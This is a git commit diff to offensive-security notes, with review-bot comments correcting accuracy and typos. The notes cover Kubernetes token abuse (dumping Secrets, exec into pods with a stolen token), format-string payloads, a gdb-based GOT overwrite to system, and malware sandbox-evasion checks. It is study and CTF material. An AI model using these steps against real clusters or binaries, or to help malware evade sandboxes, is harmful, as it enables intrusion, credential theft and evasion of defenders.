binary stuff

This commit is contained in:
Stefan Friese 2022-05-10 00:08:57 +02:00
parent d984780d59
commit e7dae2fa77
4 changed files with 136 additions and 1 deletions

View File

@ -1,7 +1,8 @@
# Kubectl # Kubectl
* Get pods, `-A` for all namespaces
```sh ```sh
kubectl get pods kubectl get pods -A
``` ```
* Check mounted secret * Check mounted secret
```sh ```sh
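Review bot: the bullet now says "`-A` for all namespaces" but the only remaining command is the `-A` form, so the plain single-namespace `kubectl get pods` (and the `-n <namespace>` variant used later in this file) is no longer shown; keep both lines so the flag reads as the optional addition the bullet describes.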
@ -16,6 +17,7 @@ kubectl get jobs
* Intel about a secret, and output * Intel about a secret, and output
```sh ```sh
kubectl describe secrets <secret> kubectl describe secrets <secret>
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json' kubectl describe secrets <secret> -o 'json'
``` ```
## Abuse Token ## Abuse Token
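Review bot: the line after the new one, `kubectl describe secrets <secret> -o 'json'`, is not a valid invocation because `kubectl describe` has no `-o` output flag; the added `kubectl get secret <secret> -o json` is the correct way to get the JSON form, so the `describe ... -o 'json'` line should be removed rather than kept alongside it. Worth a one-line note that the `data` values in that JSON are base64-encoded, and that reads of Secret objects are recorded by the API server audit log when auditing is enabled, which is how this kind of access is typically detected.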
@ -33,5 +35,14 @@ kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file * If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh ```sh
kubectl apply -f pod.yml --token=$TOKEN kubectl apply -f pod.yml --token=$TOKEN
```
* Start Pod
```sh
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
``` ```
## Start Pods
```sh
kubectl exec -it <podname> -n <namespace> -- /bin/bash
```
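Review bot: the two new headings "Start Pod" and "Start Pods" both show `kubectl exec`, which attaches a shell to a pod that is already running; the step that actually starts the pod is the `kubectl apply -f pod.yml` block just above them. Rename both to something like "Exec into pod", merge them into one bullet, and make the second block consistent with the rest of the file by passing `--token=$TOKEN` (it is the only `exec` example here that omits it).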

View File

@ -1,6 +1,7 @@
# Format String # Format String
* Read and write values from stack * Read and write values from stack
* [axcheron's writeup](https://axcheron.github.io/exploit-101-format-strings/)
## Read ## Read
@ -8,11 +9,21 @@
```sh ```sh
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
``` ```
* Do long long hex reading from stack
```sh
%llx
```
* Select values as string, e.g. the second value * Select values as string, e.g. the second value
```sh ```sh
%2$s %2$s
``` ```
* Another way of reading is via `%p` * Another way of reading is via `%p`
* Read pointer on stack at offset 42
```sh
%42$p
```
* [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one * [ir0stone's pwn-notes](https://github.com/ir0nstone/pwn-notes/blob/master/types/stack/format-string.md) contains some useful pwntool scripts like this one
```python ```python
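Review bot: "Read pointer on stack at offset 42" is not quite what `%42$p` does; the positional index selects the 42nd variadic argument, and on x86-64 (System V) the first five of those come from registers (`rsi`, `rdx`, `rcx`, `r8`, `r9`), so stack reads only begin at `%6$p` and argument index and stack slot differ by that amount. Reword the bullet to "read the 42nd argument as a pointer" and mention the register/stack split, since the later `AAAA%6$p` tip in this file depends on it. The `%llx` bullet should also say that the width modifier only matters on 32-bit targets where `%x` reads 4 bytes; on x86-64 `%p` already prints the full 8-byte word.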
@ -27,3 +38,42 @@ payload += p32(0x8048000)
p.sendline(payload) p.sendline(payload)
log.info(p.clean()) log.info(p.clean())
``` ```
## Offset
* Read at offset as pointer value at the 42th argument on the stack
```sh
%42$s
```
* If the pointer at the offset references a string you can dereference by
```sh
%42$s
```
## Length of output
* Padding of the first argument on stack to the given length
```sh
%31337x
```
## Parameters
|Parameters |Type |Passed as
|-----------------|-------------------------------------------|-----------|
%d decimal (int) value
%u unsigned decimal (unsigned int) value
%x hexadecimal (unsigned int) value
%p hexadecimal (unsigned int), nice layout value
%s string ((const) (unsigned) char*) reference
%n write the number of bytes ypu put in, (*int) reference
## Tips and Tricks
* Overwrite GOT when there is no FullRELRO, when it is not read only
* Find the input argument on the stack. Write `AAAA` and look out where it is placed on the stack
```sh
AAAA%6$p
```
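Review bot: the Parameters table will not render because the data rows are missing the `|` column separators that the header and divider lines use, e.g. `| %d | decimal (int) | value |`; while fixing that, correct the types: `%p` takes a `void *` (not `unsigned int`), `%n` takes an `int *` (not `(*int)`), and "ypu" is a typo. In the Offset section the first bullet says "as pointer value" but shows `%42$s`, which is the dereference already shown in the second bullet; the pointer read is `%42$p` and it duplicates the `%42$p` bullet added earlier in this file, so either drop it or merge the two. Finally, the `%31337x` bullet should state that the padding width is what sets the byte count that `%n` later records, otherwise the "Length of output" section reads as unrelated to the rest.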

View File

@ -0,0 +1,32 @@
# Procedure Lookup Table, Global Offset Table
* Both are part of dynamic binaries
* PLT resolves called function address of shared object
* A function call inside the binary, to a function inside a shared object is done via PLT
* __PLT__ contains dynamic address, references GOT
* __GOT__ contains the absolute address of the called functions. Dynamic linker updates the GOT
* __Lazy Linking__ is the process of loading the called SO function after they are called for the first time
## pwn
* Overwrite the GOT address of a called functions, which then will be returned instead
* Check the disassembly of the binary for SO function call
```sh
x/s <functionaddress>
x/3i <functionaddress>
```
* This is the PLT address
* Check the GOT address of the PLT. There should be `PTR` via `jmp` to the GOT address of the function
* Rewrite this address with for example `system`. Take a look where it is placed
```sh
p system
```
* Set the address of the `jmp` to GOT to `system` address
```sh
set *<foundGOTjmpAddress>=<foundSystemAddress>
```
* Fill the buffer with the argument to `system`
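Review bot: `x/s <functionaddress>` prints the bytes at that address as a NUL-terminated string, so it will not show the PLT stub; `x/3i` is the command that disassembles it and the `x/s` line should be dropped. These are gdb commands (`x/`, `p`, `set *addr=`), not shell, so the fences should be tagged accordingly rather than `sh`. The "pwn" steps should also carry the caveat already given in the format-string notes: with Full RELRO the GOT is mapped read-only after the linker resolves it, so the `set *<foundGOTjmpAddress>=...` overwrite fails there; `checksec` output or `readelf -l` (look for `GNU_RELRO` together with `BIND_NOW`) tells you which case you are in. Minor: "the GOT address of a called functions, which then will be returned" should read "a called function, which is then called instead".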

misc/sandbox_evasion.md Normal file
View File

@ -0,0 +1,42 @@
# Sandbox Evasion
* Evade the usual checks that will be run on you malware
## Sleeping
* [checkpoint](https://evasions.checkpoint.com/techniques/timing.html)
* [joesecurity](https://www.joesecurity.org/blog/660946897093663167)
## Geolocation
* Check the IP of the machine
* Check the block of the ISP via
```sh
https://rdap.arin.net/registry/ip/<IPBlock>
```
## System Info
* Check system info like
```sh
hostname
user
serial number
software versions
hardware specs
product keys
```
## Network Info
* Check all available network info like
```sh
interfaces
traffic
groups
domain admins
enterprise admins
dns
```
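Review bot: the three `sh` fences in Geolocation, System Info and Network Info contain a URL and two lists of things to check, not commands, so they should be plain bullet lists (or, for the RDAP lookup, a `curl https://rdap.arin.net/registry/ip/<IPBlock>` line if a runnable form is intended). Under Network Info, "groups", "domain admins" and "enterprise admins" are directory-membership checks rather than network details and belong in their own heading. "you malware" in the intro is a typo for "your malware", and the Sleeping section has only two links with no description of the technique the links cover; a one-line summary would make the section self-contained.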